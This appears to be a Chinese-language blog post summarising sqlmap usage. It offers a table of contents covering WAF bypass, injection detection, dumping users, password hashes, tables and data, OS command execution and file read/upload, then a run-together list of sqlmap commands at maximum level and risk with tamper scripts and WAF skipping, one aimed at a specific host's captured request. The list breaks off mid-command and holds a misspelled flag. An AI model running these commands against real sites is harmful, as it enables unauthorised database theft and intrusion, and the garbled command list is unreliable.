sqlmap 注入方式、使用总结(常)

📅 2026/7/31 17:45:51 👁️ 阅读次数 📝 编程学习
sqlmap 注入方式、使用总结(常)

目录

Sqlmap

Sqlmap的简单用法

探测指定URL是否存在WAF,并且绕过

探测指定URL是否存在SQL注入漏洞

查看数据库的所有用户

查看数据库所有用户名的密码 

查看数据库当前用户 

判断当前用户是否有管理权限

列出数据库管理员角色

查看所有的数据库

查看当前的数据库

爆出指定数据库中的所有的表 

爆出指定数据库指定表中的所有的列

爆出指定数据库指定表指定列下的数据

爆出该网站数据库中的所有数据

Sqlmap的高级用法

指定脚本进行过滤

探测等级和危险等级

伪造 Http Referer头部

执行指定的SQL语句

执行操作系统命令

从数据库中读取文件

上传文件到数据库服务器中

Sqlmap的更多用法


sqlmap -r /Users/yvan/.gather/api2.1233.art.1211-163532.req -p code --level=5 --risk=3 --batch sqlmap -r request.txt -p srg --dbms=mysql --current-db --risk=3 --level=5 --fandom-agent --tamper=bluecoat --technique=bt --time-sec=10 --skip-waf sqlmap -r request.txt --level=5 --risk=3 --batch sqlmap -r request.txt --level=5 --risk=3 --batch -p name sqlmap -r request.txt --level=5 --risk=3 --batch --force-ssl --skip-urlencode sqlmap -r request.txt --dbms=mysql --current-db --risk=3 --level=5 --random-agent --tamper=bluecoat --technique=BT --time-sec=10 --skip-waf -p projectId sqlmap -r request.txt --dbms=mysql --current-db --risk=3 --level=5 --random-agent --tamper=bluecoat --proxy http://127.0.0.1:8080 --technique=BT --time-sec=10 --skip-